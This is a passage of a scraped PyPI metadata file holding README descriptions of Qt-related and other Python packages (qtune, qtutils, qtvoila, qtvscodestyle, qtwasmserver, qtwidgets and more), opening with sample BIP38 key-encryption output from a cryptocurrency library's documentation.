c\",\"address\":\"QfAtAjYNEQMAVtxNaXCWcg1rws3ubJJAED\",\"lot\":567885,\"sequence\":1}-----------------------------------------------------------------------------------------------------------------------------\nIntermediatePassphrase:passphraseondJwvQGEWFNsbiN6AVu4r4dPFz4xeJoLg2vQGULvMzgYRKiGezwNDzaAxfX57\nEncryptedWIF:{\"encrypted_wif\":\"6PnQ3P5GdsSJSUcJCAmtvn74U9gqPs8JMZLdVBkBYsUvSVd4TjgSZEqB7w\",\"confirmation_code\":\"cfrm38VUEZdLCyEmCMZqbbvdhUdsuPZdYy2tmBcbDdmdkyFiLyiScPQSeotgvS6vQZjPXhj92Xj\",\"public_key\":\"039e60857454bff0635324e132e00f102fbe1ab6b0846b12737eca18a05b473e2a\",\"seed\":\"99241d58245c883896f80843d2846672d7312e6195ca1a6c\",\"public_key_type\":\"compressed\",\"address\":\"QS3xSF9psn8DMT6uBExPDkm258eJPqJbsB\"}ConfirmCode:{\"public_key\":\"039e60857454bff0635324e132e00f102fbe1ab6b0846b12737eca18a05b473e2a\",\"public_key_type\":\"compressed\",\"address\":\"QS3xSF9psn8DMT6uBExPDkm258eJPqJbsB\",\"lot\":null,\"sequence\":null}BIP38Decrypted:{\"wif\":\"KxzUftF5tyTUBfCYD5fJ3qDftrGBf3CoYLvQ32p8WotNYrMW4c3t\",\"private_key\":\"34de039d8e90172f246ec3190fc8bd98e46f11bc5d50d062d0d6f806e43372a9\",\"wif_type\":\"wif-compressed\",\"public_key\":\"039e60857454bff0635324e132e00f102fbe1ab6b0846b12737eca18a05b473e2a\",\"public_key_type\":\"compressed\",\"seed\":\"99241d58245c883896f80843d2846672d7312e6195ca1a6c\",\"address\":\"QS3xSF9psn8DMT6uBExPDkm258eJPqJbsB\",\"lot\":null,\"sequence\":null}-----------------------------------------------------------------------------------------------------------------------------\nIntermediatePassphrase:passphraseb7ruSNDGP7cmphxdxHWx8oo88zHuBBeFyvaWYD2zqHUpLwvXYhqTBnwxiiCUf6\nEncryptedWIF:{\"encrypted_wif\":\"6PoLtrDYSMopr5nRKDN9LDanSPiSPRQ3vkfmT2gj4c3E3S5FeGTmyuG12z\",\"confirmation_code\":\"cfrm38VXKJasUvzUJiyuBsX5TqVdhNV4BhzXEE8ge9TAm3Y13jobt5x8BMqcXNEpdDLgumedBBW\",\"public_key\":\"03548814ac8ce03397f544dfa9bde1d148b503237103362da170fd3f330cf3e094\",\"seed\":\"99241d58245c883896f80843d2846672d7312e6195ca1a6c\",\"public_key_type\":\"compressed\",\"address\":\"QQ2yBHc39h3Fyb8AnKuwtw1Soxpq9f4GRt\"}ConfirmCode:{\"public_key\":\"03548814ac8ce03397f544dfa9bde1d148b503237103362da170fd3f330cf3e094\",\"public_key_type\":\"compressed\",\"address\":\"QQ2yBHc39h3Fyb8AnKuwtw1Soxpq9f4GRt\",\"lot\":369861,\"sequence\":1}BIP38Decrypted:{\"wif\":\"L3uXqD8dC2zNpRdDVfsmUCNrz6HMXk2j9fVkgftwd3SM35W6XNVL\",\"private_key\":\"c7829407b0a6aee68539bcc4f58878722ac0f441aa462b303da31ab232253d64\",\"wif_type\":\"wif-compressed\",\"public_key\":\"03548814ac8ce03397f544dfa9bde1d148b503237103362da170fd3f330cf3e094\",\"public_key_type\":\"compressed\",\"seed\":\"99241d58245c883896f80843d2846672d7312e6195ca1a6c\",\"address\":\"QQ2yBHc39h3Fyb8AnKuwtw1Soxpq9f4GRt\",\"lot\":369861,\"sequence\":1}-----------------------------------------------------------------------------------------------------------------------------DevelopmentTo get started, just fork this repo, clone it locally, and run:pip install -e .[tests] -r requirements.txtTestingYou can run the tests with:pytestOr usetoxto run the complete suite against the full set of build targets, or pytest to run specific\ntests against a specific version of Python.LicenseDistributed under theMITlicense. SeeLICENSEfor more information."} +{"package": "qtune", "pacakge-description": "qtune Readme: IntroductionThe qtune package contains tools for the setup of a general optimization program. It is originally designed for the\nautomatic fine-tuning of semiconductor spin qubits based on gate defined quantum dots, but applicable to general\noptimization problems with dependent target parameters.\nAn interface to the physical back-end must be provided. With this back-end, control\nparameters (here assumed to be voltages) are set and target parameters are measured.Class names are writtenboldand functionscursivethroughout the readme. UML class diagrams are inserted to show\nthe heritage and dependencies, and UML activity diagrams visualize function calls.\nThe package abbreviations are pd for pandas and np for numpy.Installationqtune is compatible with Python 3.5+.\nFor development we recommend cloning the git repositoryhttps://github.com/qutech/qtuneand installing by:python setup.py developIt can also be installed as pip package:pip install qtuneInterface of the Physical Back-EndThe core features of this program package do not require a specific structure of the measurement software. This section\nconcerns only the required interface of the physical back-end.\nTheExperimentclass serves as abstraction of the physical experiment. It provides an interface to the control\nparameters with two functions calledread_gate_voltages() andset_gate_voltages(new_voltages). The functionset_gate_voltages(new_voltages) returns the voltages it has actually set to the experiment, which is useful if the\nhardware connected to the physical experiment uses a different floating point accuracy, or theExperimentis\nordered to set voltages exceeding physical or safety limits.TheEvaluatorclass provides the functionevaluate() which returns a fixed number of parameters and a measurement\nerror, which is interpreted as the variance of the evaluation.Proposed Measurement and Evaluation StructureThe implementation of a physical back-end, as contained in the qtune package, should be regarded as proposal.TheExperimentprovides the functionmeasure(Measurement), which receives an instance of theMeasurementclass and returns the raw data.\nTheMeasurementcontains a dictionary of data of any type used to define the physical measurement.\nTheEvaluatorclass calls the functionExperiment.measure(Measurement) to initiate the physical\nmeasurements. It contains a list ofMeasurementsand the analysis software required to extract the parameters from the raw data returned by the\nexperiment. This could be for example a fitting function or an edge detection.Parameter TuningThis section describes how the dependency between parameters is taken into account.\nThe parameters are grouped by instances of theParameterTunerclass. Each group is tuned simultaneously, i.e.\ndepends on the same set of distinct parameters. The dependencies are assumed always one directional and static. TheAutotunerstructures the groups of parameters in an hierarchy, which is represented as list ofParameterTuners.Consider the following example from the tuning of a quantum dot array.\nImagine the following hierarchy consisting of three groups of parameters i.e. threeParameterTuners:Contrast in the Sensing Dot SignalChemical Potentials / Positions of the Charge Stability DiagramTunnel CouplingsAll scans require a good contrast in the sensing dot for an accurate evaluation of the parameters. Therefore the\ncontrast in the sensing dot signal is the first element in the hierarchy. The measurement of tunnel couplings requires\nknowledge of the positions of transitions in the charge diagram. If the chemical potentials change, the charge\ndiagram is shifted, therefore the position of the charge diagram i.e. the chemical potentials must be tuned before the\ntunnel couplings.AParameterTunersuggests voltages to tune the parameters in his group.\nIt can be restricted to use any set of gates. It can also slice the voltage corrections\nto restrict the step size so that the algorithm is less vulnerable to the non-linearity of the target parameters.\nThe tuning of a group of parameters does ideally not detune the parameters which the group depends on i.e. which are\nhigher in the hierarchy.TheAutotunerclass handles the coordination between the groups of parameters in the following sense. It decides which group of\nparameters must currently be evaluated or tuned and calls theParameterTunerto evaluate the corresponding\ngroup of parameters or to suggest new voltages. It also sets the new voltages on the Experiment.\nIt works as finite-state machine as described in the UML activity diagram below.Optimization AlgorithmsThe voltage steps of eachParameterTunerare calculated by its member instance of theSolverclass. This class\ncan implement any optimization algorithm e.g. Nelder-Mead or Gauss-Newton algorithm.\nGradient basedSolverslike the Gauss-Newton algorithm use a instance of theGradientEstimatorclass for the\ncalculation of the gradient of target parameter.TheGradientEstimatorsubclasses implement different methods for the gradient estimation. One example is the\nKalman filter in theKalmanGradientEstimator. This is an algorithm which calculates updates on the gradient by\ninterpreting each measurement as finite difference measurement with respect to the last voltages. The accuracy of the\nparameter evaluation is then compared to the uncertainty of the estimation of the gradient in order to find the\nmost likely gradient estimation. Thereby, the gradient estimation is described as multidimensional normal distribution,\ndefined by a mean and a covariance matrix. If the covariance becomes to large in a certain direction, theKalmanGradientEstimatorsuggests a tuning step in the direction of the maximal covariance. This tuning step does not\noptimize any parameter but should be understood as finite difference measurement.The crucial point in the optimization of non orthogonal systems is the ability to tune certain parameters without\nchanging the other ones. This requires communication between theSolverinstances. DifferentSolverscan\ntherefore share the same instances of theGradientEstimatorsso that they know the dependency of these parameters\non the gate voltages.Furthermore, theAutotunercommunicates which parameters are already tuned to theParameterTuners. AParameterTunercan share this information with it'sSolver, which then calculates update steps\nin the null space of the gradients belonging to parameters which are tuned by anotherParameterTuners.\nASolveralso passes this information on to it'sGradientEstimators, which calculate the gradients only in the\nmentioned null space.Getting StartedThe IPython notebook \"setup_tutorial.ipynb\" gives a detailed\ntutorial for the setup of an automated fine-tuning program. The physical back-end is replaced by a simulation to enable\nthe tutorial to be executed before the connection to an experiment.\nIn this simulated experiment, a double quantum dot and a sensing dot are tuned. The tuning hierarchy is given byTheParameterTunersandSolverswhich are used in the setup serve as an illustrative example.\nThey are structured in the tuning hierarchy:the sensing dotthe x and y position of the charge diagramtwo parameters, being the inter dot tunnel coupling and the singlet reload timeThe gates of the sensing dot are assumed to have only an negligible effect on the positions and\nparameters. Therefore theSolverof the sensing dot is independent of the others. The other gates are simultaneously\ntuning the positions and parameters. The positions and parameters are tuned byParameterTunersrestricted to the\nsame gates and theirSolverinstances share allGradientEstimators. TheGradientEstimatorsbelonging to the\nparameters estimate the gradients only in the null space of the gradients belonging to the positions.FeaturesStorageAfter each evaluation of parameters, change in voltages or estimation of gradients,\nthe full state of all classes except for the experiment is serialized and stored\nin an HDF5 file. The full state of the program can be reinitialized from any library file. This way,\nthe program can be set back to any point during the tuning. TheHistoryclass\nadditionally saves all relevant information for the evaluation of the performance. TheHistoryclass can plot the\ngradients, last fits, control and target parameters.GUIFor real-time plotting of parameters and gradients, the user can couple theHistoryand theAutotunerto the GUI. The GUI automatically stores the program data in the HDF5 library and lets the user start and\nstop the program conveniently. The program can also be ordered to execute only one step at a time. The program is\nlogging its activity and the user can chose how detailed the logging describes the current activity by\nsetting the log level.Naming ConventionVoltagesare used in the Evaluator class to describe the voltages on the gates in the experiment.Positionsare an abstraction of gate voltages in the Gradient and Solver classes. These classes\ncould not only be used for the tuning algorithm but they could be reused in any gradient\nbased solving algorithm.Parameterscorrespond to properties of the physical experiment. They are extracted from the measurement data\nby the Evaluator class and handed over to the ParameterTuner class.Valuesare the abstraction of parameters in the Gradient and Solver classes.Optionsdescribe the measurements in the Measurement class.LicenseCopyright (c) 2017 and later, JARA-FIT Institute for Quantum Information,\nForschungszentrum J\u00c3\u00bclich GmbH and RWTH Aachen University\n\nThis program is free software: you can redistribute it and/or modify\nit under the terms of the GNU General Public License as published by\nthe Free Software Foundation, either version 3 of the License, or\n(at your option) any later version.\n\nThis program is distributed in the hope that it will be useful,\nbut WITHOUT ANY WARRANTY; without even the implied warranty of\nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\nGNU General Public License for more details.\n\nYou should have received a copy of the GNU General Public License\nalong with this program. If not, see ."} +{"package": "qt-unraveling", "pacakge-description": "No description available on PyPI."} +{"package": "qturtle", "pacakge-description": "This is a revamped Qt edition of Python\u2019s turtle graphics.Execute:$ qturtleThis will fire the application. Happy drawing!"} +{"package": "qtutils", "pacakge-description": "qtutilsUtilities for providing concurrent access to Qt objects, simplified QSettings storage,\nand dynamic widget promotion when loading UI files, in Python Qt applications. Includes\nthe Fugue icon set, free to use with attribution to Yusuke Kamiyamane.DocumentationPyPISource code (GitHub)InstallationTo install the latest release version, runpip install qtutils.To install latest development version, clone the GitHub repository and runpip install .to install, orpip install -e .to install in 'editable' mode.Summaryqtutilsis a Python library that provides some convenient features to Python\napplications using the PyQt5/PySide2 widget library.qtutils3.0 dropped support for Python 2.7, PyQt4 and PySide. If you need to use these\nplatforms, you may useqtutils2.3.2 or earlier.qtutilscontains the following components:invoke_in_main: This provides some helper functions to interact with Qt from\nthreads.UiLoader: This provides a simplified means of promoting widgets in*.uifiles to a\ncustom widget of your choice.qsettings_wrapper: A wrapper around QSettings which allows you to access keys of\nQSettings as instance attributes. It also performs automatic type conversions.icons: An icon set as aQResourcefile and corresponding Python module. The\nresulting resource file can be used by Qt designer, and the python module imported by\napplications to make the icons available to them. The Fugue icon set was made by\nYusuke Kamiyamane, and is licensed under a Creative Commons Attribution 3.0 License.\nIf you can't or don't want to provide attribution, please purchase a royalty-free\nlicense fromhttp://p.yusukekamiyamane.com/Qt: a PyQt5/PySide2 agnostic interface to Qt that allows you to write software using\nthe PyQt5 API but have it run on either PyQt5 or PySide2.outputbox: aQTextEditwidget for displaying log/output text of an application,\neither by calling methods or by sending data to it overzeromq.Using icons with Qt designerTo use the icons from Qt designer, clone this repository, and point Qt designer to the.qrcfile for the icons set:icons/icons.qrc. Unfortunately Qt desginer saves the\nabsolute path to this file in the resulting.uifile, so if the.uifile is later\nedited by someone on another system, they will see an error at startup saying the.qrcfile cannot be found. This can be ignored and the.uifile will still function\ncorrectly, but Qt designer will need to be told the local path to the.qrcfile before\nit can display the icons within its interface."} +{"package": "qtv", "pacakge-description": "qTVA set of tools to facilitate Timing Verification of SCL circuits."} +{"package": "qtvoila", "pacakge-description": "QtVoilaAQt for Pythonextension forVoila!QtVoilaa Qt for Python (PySide6) widget that controls and renders a Voila application. It's a convenient way of embedding the awesomeness of Voila in your Qt applications.The idea of the widget and implementation details are described in thisblog post.Installation$ pip install qtvoilaUsageQtVoila should be imported and used as a PySide6 widget, anywhere inside your GUI application. Although it can be initialized with default parameters, you are able to define theparent(the PySide6 application), thetemporary directorywhere any created notebooks will be temporarily stored, the path to an existingexternal notebookand the boolean option to either strip code sources on Voila rendering or not:fromqtvoilaimportQtVoilavoila_widget=QtVoila(parent=None,temp_dir=None,external_notebook=None,strip_sources=True)If creating a notebook programmatically, new cells can be added with the methodadd_notebook_cell(). This method accepts three arguments:code_importsis a dictionary of modules to be imported,codeis the string containing the cell's code or markdown text andcell_typedefines if the cell is of type code or markdown. Examples:# Mardown cellmtext=\"#This is my title\\n\"mtext+=\"Here goes some text. Check out this graphic:\"voila_widget.add_notebook_cell(code=mtext,cell_type='markdown')# Code cellimports={'matplotlib':['pyplot'],'numpy':[],}code=\"%matplotlib inline\\n\"code+=\"pyplot.plot(numpy.random.rand(10))\"voila_widget.add_notebook_cell(code_imports=imports,code=code,cell_type='code')To run the Voila process and render the result on widget:voila_widget.run_voila()To clear widget and stop the background Voila process:voila_widget.close_renderer()ExamplesHereyou can find some examples on how to use QtVoila in your PySide6 application. For example, creating notebooks from user's input and rendering them:To have your GUI importing existing notebooks and rendering them:"} +{"package": "qtvscodestyle", "pacakge-description": "QtVSCodeStyleVS Code Style for PySide and PyQt.QtVSCodeStyle enables to use VS Code themes in pyqt and pyside.\nThe default and extension themes of VS Code can be used.SCREENSHOTSDark (Visual Studio)Light (Visual Studio)Dark High ContrastNight OwlOne Dark ProAyu Lightetc...RequirementsPython 3.7+PySide6, PyQt6, PyQt5 or PySide2Not tested on linux.Installation MethodLast released versionpip install qtvscodestyleLatest development versionpip install git+https://github.com/5yutan5/QtVSCodeStyleUsageUse default themeTo apply VS Code's default theme, run:importsysfromPySide6.QtWidgetsimportQApplication,QMainWindow,QPushButtonimportqtvscodestyleasqtvscapp=QApplication(sys.argv)main_win=QMainWindow()push_button=QPushButton(\"QtVSCodeStyle!!\")main_win.setCentralWidget(push_button)stylesheet=qtvsc.load_stylesheet(qtvsc.Theme.DARK_VS)# stylesheet = load_stylesheet(qtvsc.Theme.LIGHT_VS)app.setStyleSheet(stylesheet)main_win.show()app.exec()\u26a0 The image quality may be lower on Qt5(PyQt5, PySide2) due to the use of svg. You can add the followingattributeto improve the quality of images.app.setAttribute(Qt.ApplicationAttribute.AA_UseHighDpiPixmaps)Available ThemesTo check available themes, run:qtvsc.list_themes()Theme name Symbol\n___________ ______\n\nLight (Visual Studio): LIGHT_VS\nQuiet Light : QUIET_LIGHT\nSolarized Light : SOLARIZED_LIGHT\nAbyss : ABYSS\nDark (Visual Studio) : DARK_VS\nKimbie Dark : KIMBIE_DARK\nMonokai : MONOKAI\nMonokai Dimmed : MONOKAI_DIMMED\nRed : RED\nSolarized Dark : SOLARIZED_DARK\nTomorrow Night Blue : TOMORROW_NIGHT_BLUE\nDark High Contrast : DARK_HIGH_CONTRASTUse extension themesIf you want to use a third party theme, you will need to download the theme file from the repository and load theme by usingload_stylesheet().Simple example usingOne Dark Pro.One Dark Pro is one of the most used themes for VS Code.First of all, download or copy and pastethe theme file from the repository.Then load the stylesheet using the saved file.theme_file=r\"OneDark-Pro.json\"stylesheet=qtvsc.load_stylesheet(theme_file)app.setStyleSheet(stylesheet)Color customizationThe configuration method is the same asworkbench.colorCustomizationsof VSCode.About color code format, seehttps://code.visualstudio.com/api/references/theme-color#color-formats.# Set the button text color to red.custom_colors={\"button.foreground\":\"#ff0000\"}stylesheet=qtvsc.load_stylesheet(qtvsc.Theme.DARK_VS,custom_colors)To check available color id, run:qtvsc.list_color_id()Color ids is almost the same asVS Code's theme color document. Some own color ids like disabled attribute are available.SVG and Font QIcon for VS Code styleYou can also use various icon fonts and svg as QIcon.QtVSCodeStyle identifies icons by symbolic and icon name.The following symbolic are currently available to use:Font Awesome Free(5.15.4)- Font IconFaRegular: Regular styleFaSolid: Solid styleFaBrands: Brands stylevscode-codiconsVsc: VS Code style - SVG IconYou can use icon browser that displays all the available icons.python -m qtvscodestyle.examples.icon_browserTwo functions,theme_icon()andicon()are available.theme_icon()create QIcon will automatically switch the color based on the set color-id when you callload_stylesheet(Another Theme).star_icon=qtvsc.theme_icon(qtvsc.Vsc.STAR_FULL,\"icon.foreground\")button=QToolButton()button.setIcon(star_icon)# star_icon switch to the MONOKAI's \"icon.foreground\" color.qtvsc.load_stylesheet(qtvsc.Theme.MONOKAI)icon()create QIcon with static color.# Set redstar_icon=qtvsc.icon(qtvsc.Vsc.STAR_FULL,\"#FF0000\")button=QToolButton()button.setIcon(star_icon)# Keep red.qtvsc.load_stylesheet(qtvsc.Theme.MONOKAI)Create new themeYou can create your own theme. The configuration method is the same as theme extension of VS Code.\nThe only properties to set are the theme type and colors.Dictionary, json file(json with comment), and string formats are supported.Dictionarycustom_theme={\"type\":\"dark\",# dark or light or hc(high contrast)\"colors\":{\"button.background\":\"#1e1e1e\",\"foreground\":\"#d4d4d4\",\"selection.background\":\"#404040\",},}stylesheet=qtvsc.load_stylesheet(custom_theme)String(Json with comment text)custom_theme=\"\"\"{\"type\": \"dark\",\"colors\": {\"button.background\": \"#1e1e1e\",\"foreground\": \"#d4d4d4\",\"selection.background\": \"#404040\"}}\"\"\"# You need to use loads_stylesheetstylesheet=qtvsc.loads_stylesheet(custom_theme)Json with commentcustom_theme_path=r\"custom_theme.json\"# or you can use pathlib.Path object# custom_theme_path = pathlib.Path(\"custom_theme.json\")stylesheet=qtvsc.load_stylesheet(custom_theme_path)If you customize using json files, you can use json schema.\nCopy json schema fromqvscodestyle/validate_colors.jsonUsing schema example for VS Code:https://code.visualstudio.com/docs/languages/json#_json-schemas-and-settingsCheck common widgetsTo check common widgets, run:python -m qtvscodestyle.examples.widget_galleryCustom propertiesThis module provides several custom properties for applying VS Code's style.For example, if you set theactivitybartotypecustom property of QToolbar, the style of the activitybar will be applied.activitybar=QToolBar()activitybar.setProperty(\"type\",\"activitybar\")WidgetPropertyProperty valueCommand for demoQToolBartypeactivitybarpython -m qtvscodestyle.examples.activitybarQPushButtontypesecondarypython -m qtvscodestyle.examples.pushbuttonQLineEditstatewarning, errorpython -m qtvscodestyle.examples.lineeditQFrametypeh_line, v_linepython -m qtvscodestyle.examples.lineBuild resourcesQtVSCodeStyle creates and deletes icon files dynamically using temporary folder.The style sheet you created will no longer be available after you exit the program.Therefore, QtVSCodeStyle provides the tool to build style sheets with resources that can be used after you exit the program.In order to build style sheets, run:python -m qtvscodestyle.resource_builder --theme dark_vsIt is also possible to apply custom colors.python -m qtvscodestyle.resource_builder -t dark_vs --custom-colors-path custom.json// custom.json{\"focusBorder\":\"#ff0000\",\"foreground\":\"#ff00ff\"}In order check details of the command, run:python -m qtvscodestyle.resource_builder --help\u26a0 Resource files and svg folders should always be in the same directory.\u26a0 Not support on PyQt6. PyQt6 removed Qt\u2019s resource system.How to use in Qt DesignerRun theqtvscodestyle.resource_buildercommand and generate resources.Copy the stylesheet text fromstylesheet.qss.Paste the copied stylesheet into stylesheet property of the top-level widget.Register theresource.qrcin generated folder to the resource browser. If you use Qt Creator, addresource.qrcand svg folder to your project.LicenseMIT, seeLICENSE.txt.QtVSCodeStyle incorporates image assets from external sources.\nThe icons for the QtVSCodeStyle are derived from:Font Awesome Free 5.15.4 (Font Awesome; SIL OFL 1.1)Material design icons (Google; Apache License Version 2.0)vscode-codicons (Microsoft Corporation; CC-BY-SA-4.0 License)SeeNOTICE.mdfor full license information.AcknowledgementsThis package has been created with reference to the following repositories.QDarkStyleSheetBreezeStyleSheetsqt-materialvscodeQtAwesomeNapari"} +{"package": "qtwasmserver", "pacakge-description": "Qt for WebAssembly development server.This server is intented to be used while developing and testing WebAssembly applications on a\ntrusted network. It is not suitable for production use cases like distributing applicaitons\nto end users over public networks.The server is an upgrade from the python one line server (\"python -m http.server\"), and offers the\nfollowing features:Zero-configuration / minimal configuration.Support for binding to multiple addresses in addition to localhost. This is useful\nfor e.g. testing on mobile devices on the same local network as the development machine.\nAddress can be addded individually using the --address option. Pass the \"-all\" option to\nbind to all available addresses.Support for generating https certificates using the mkcert utility. Many web features\nrequire a secure context. While \"localhost\" is considered a secure context (also when plain\nhttp is used), other addresses are not. Clicking through the \"not secure\" warnings is\nan option, but using a valid certificate improves flow.Support for compression using brotli. By default, the server compresses when serving over a\npublic, non-localhost address. (localhost is fast, enabling compression here usualually increases\ndownload time instead of doing the opposite). Compression be controlled with the --compress-always and\n--compress-never options.Support for enabling cross-origin isolation mode. This sets the so-called COOP and COEP headers,\nwhich are required to enable SharedArrayBuffer and multithreading. Enable with the --cross-origin-isolation\noption. Note that this may impose additional restrictions on cross-origin requests.TODO:ipv6 supportInstallation and Usagepip install qtwasmserverUsage exmaples:qtwasmserver # Start server on localhost, serve $CWD\nqtwasmserver /path/to/wasm/builds # Specify web root path\nqtwasmserver -p 1080 # Start server(s) on custom port\nqtwasmserver --all-interfaces # Start server(s) on all network interfaces\nqtwasmserver -a 10.0.0.2 # Start server on specific address, in addition to localhost\nqtwasmserver --cross-origin-isolation # Enable cross-origin isolation mode for multithreading\nqtwasmserver -h # Show helpUsing mkcertqtwasmserver can optinally use mkcert to generate https certifacates. Seehttps://github.com/FiloSottile/mkcertfor\ninstallation and getting started instructions.The basic flow is:Gereate a certificate authority (CA), and install that on all devices and browsers.\nThis is a one time operation. mkcert will use thuis CA to sign certificates.Generate a certificate for each address you want to use. This is done automatically\nby this server.The beneifit of this appraoch is that certificates can be generated locally, on demand,\nfor each server address in use. This can be useful when for instance moving a development\nmachine between home and office networks."} +{"package": "qtwidgets", "pacakge-description": "Custom Qt5 Python WidgetsQt5 comes with a huge number of widgets built-in, from simple text boxes to digital displays, vector graphics canvas and a full-blown web browser. While you can build perfectly functional applications with the built-in widgets, sometimes your applications will need amore.This repo contains a library ofcustom Python Qt5 widgetswhich are free to use in your own applications. Widgets are compatible with both PyQt5 and PySide2 (Qt for Python). Currently the repository includes -WidgetsLibraryGraphical EqualizerVisualize audio frequency changes with configurable styles and decayfrom qtwidgets import EqualizerBarDocumentationPower BarRotary control with amplitude displayfrom qtwidgets import PowerBarDocumentationPaletteSelect colours from a configurable linear or grid palette.from qtwidgets import PaletteHorizontalfrom qtwidgets import PaletteGridDocumentationLinear Gradient EditorDesign custom linear gradients with multiple stops and colours.from qtwidgets import GradientDocumentationColor ButtonSimple button that displays and selects colours.from qtwidgets import ColorButtonPaintDraw pictures with a custom bitmap canvas, with colour and pen control.from qtwidgets import PaintPassword EditA password line editor with toggleable visibility action.from qtwidgets import PasswordEditReplace checkboxes with this handy toggle widget, with custom colors and optional animationsfrom qtwidgets import Togglefrom qtwidgets import AnimatedToggleDocumentationFor a more detailed introduction to each widget and a walkthrough of their APIsseethe custom widget library on LearnPyQt.More custom widgets will follow,if you have ideas just let me know!Licensed MIT/BSDv2feel free to use in your own projects."} +{"package": "qt-widgets", "pacakge-description": "qt-widgetsReusable Qt widgets library.Browser WidgetAutomatic layout for similar objects.model:List[str]=[f'data{_}'for_inrange(10_000)]browser=BrowserWidget(config=BrowserConfig(item=Item(# width=200,),page=Page(index=4,size=25),),builder=lambdaitem:QPushButton(item),model=model,)Gallery WidgetBased on Browser Widget with auto-resize behavior.defbuilder(path:str):defreader()->numpy.ndarray:returncv2.imread(path)returnreaderwidget=GalleryWidget(images=[builder('image1.jpg'),builder('image2.jpg')],config=BrowserConfig(page=Page(size=20)))Installpip install qt-widgetsRequirementsPyQt5pip install pyqt5\npip install pyqt5-toolsUsageRun any script from thetest folder."} +{"package": "qt_widgetstyler", "pacakge-description": "Inherit WidgetStyler class:from qt_widgetstyler import WidgetStyler\nws = WidgetStyler()Create a new category. A category is a logical separation between\ndifferent sections of your program\u2019s widgets, and allows you to easily\napply new or updated stylesheets to one or more categories\nsimultaneously.ws.new_style_category('top_navigation')A custom widget group is created below the category. The custom widget\ngroup is a collection of individual widgets, generally of the same type\n(QLabel, QTableView, etc.), and all individual widget objects assigned\nto this custom widget group will share the same stylesheet.ws.add_custom_widget(category='top_navigation', widget_name='top_navigation_qlabel_text')For this category of our program, we have three QLabel widget objects\nwhich we wish to assign to our custom widget group, QLabel1, QLabel2,\nand QLabel3. We can add them individually, or together in a list.Individually:ws.add_widget(widget_instance=QLabel1, category='top_navigation', widget_name='top_navigation_qlabel_text')Together:ws.add_widgets(widget_instances_list=[QLabel2, QLabel3], category='top_navigation', widget_name='top_navigation_qlabel_text')We now add a StyleSheet to this custom widget group, which will be\nshared by all the widget objects assigned to it. This only stores the\nStyleSheet, it does not yet apply it:ws.add_stylesheet(category='top_navigation', widget_name='top_navigation_qlabel_text', stylesheet='QLabel { color: rgb(0, 0, 0); }')To apply the stylesheets to our widgets, we have three options.We can apply one widget group\u2019s stylesheets individually:ws.apply_stylesheet(category='top_navigation', widget_name='top_navigation_qlabel_text')To all widgets within one category:ws.apply_category_stylesheets(category='top_navigation')Or to all of our widgets in all of our categories:ws.apply_all_stylesheets()To view all of your defined categories:ws.show_categories()To view all of your defined widgets within a single category:ws.show_category_widgets(category='top_navigation')"} +{"package": "qtwirl", "pacakge-description": "qtwirlqtwirl (quick-twirl), one-function interface toAlphaTwirlQuick startJupyter Notebook:Quick start of AlphaTwirl"} +{"package": "qt-wsi-registration", "pacakge-description": "Robust quad-tree based registration on whole slide imagesThis is a library that implements a quad-tree based registration on whole slide images.Core featuresWhole Slide Image supportRobust and fastRigid and non-rigid transformationAdditional RequirementsInstall OpennSlideNotebooksExample notebooks are in the demo folder or.Ho-To:Import package and create Quad-Tree.importqt_wsi_reg.registration_treeasregistrationparameters={# feature extractor parameters\"point_extractor\":\"sift\",#orb , sift\"maxFeatures\":512,\"crossCheck\":False,\"flann\":False,\"ratio\":0.6,\"use_gray\":False,# QTree parameter\"homography\":True,\"filter_outliner\":False,\"debug\":False,\"target_depth\":1,\"run_async\":True,\"num_workers: 2,\"thumbnail_size\":(1024,1024)}qtree=registration.RegistrationQuadTree(source_slide_path=Path(\"examples/4Scanner/Aperio/Cyto/A_BB_563476_1.svs\"),target_slide_path=\"examples/4Scanner/Aperio/Cyto/A_BB_563476_1.svs\",**parameters)Show some registration debug information.qtree.draw_feature_points(num_sub_pic=5,figsize=(10,10))Show annotations on the source and target image in the format:[[\"center_x\", \"center_y\", \"anno_width\", \"anno_height\"]]annos=np.array([[\"center_x\",\"center_y\",\"anno_width\",\"anno_height\"]])qtree.draw_annotations(annos,num_sub_pic=5,figsize=(10,10))Transform coordinatesbox=[source_anno.center_x,source_anno.center_y,source_anno.anno_width,source_anno.anno_height]trans_box=qtree.transform_boxes(np.array([box]))[0]"} +{"package": "qtx", "pacakge-description": "## Quantextive AEX API Client#### Dependencies- [**Requests: HTTP for Humans**](http://docs.python-requests.org/en/master/)- install it using **pip**```pythonpip install request```- [**Pandas**](http://pandas.pydata.org/)- install it using **pip**```pythonpip install pandas```#### How to make an API request?class `ApiClient` in [`qtx.py`](qtx.py) is provisioned to make API requests. In the constructor of the `ApiClient` class, a dictionary of default headers for all requests can be supplied so that headers need not be supplied with each request.```pythondefault_headers = { 'x-api-key' : '' }client = ApiClient(default_headers)```To make a GET request, `ApiClient.get()` method is used with following params- **`api_key`**: API key required for authenticating the requests- **`name`**: `string` api name which will be appended to base_url- **`params`**: `dict` of url params**EXAMPLE**```pythonimport qtxapi = \"market-data-eod\"params = {'securityId': 'NSE:NNFM','startDate': '2017-02-08','endDate': '2017-02-10'}api_key = ''client = api_client.ApiClient()print client.get(api_key, api, params).data_frame()```The `get()` method returns a `Response` object from which below methods can be used to get response data as **json** or **Pandas DataFrame**.- `client.get(api_key, name, queryparams).json()` will return response data as **json**, and- `client.get(api_key, name, queryparams).data_frame()` will return response data as pandas **DataFrame**##### Running the test script```pythonpython tests/test.py```"} +{"package": "qtxdbpackages", "pacakge-description": "No description available on PyPI."} +{"package": "qtxmldom", "pacakge-description": "The qtxmldom package provides an API reminiscent of minidom, pxdom and other\nPython-based and Python-related XML toolkits for the qtdom and khtml modules\nprovided respectively by the PyQt and PyKDE packages."} +{"package": "qtxpack", "pacakge-description": "No description available on PyPI."} +{"package": "qty", "pacakge-description": "QtyQtyis a Python library for dealing with physical quantities.InstallationUse the package managerpipto installQty.pip install qtyUsagefromqtyimportEnergy>>>E=Energy()>>>E.meV=1000.>>>E.J1.602176634e-19ContributingPull requests are welcome. For major changes, please open an issue first to discuss what you would like to change.Please make sure to update tests as appropriate.LicenseGNU GPLv3"} +{"package": "qtymetrix", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qtymetrixs", "pacakge-description": "No description available on PyPI."} +{"package": "qtypes", "pacakge-description": "qtypesBuild qt graphical user interfaces out of simple type objects.InstallationTODOTypesBoolvalue: boolButtonvalue: None\nbackground_color: str\ntext: 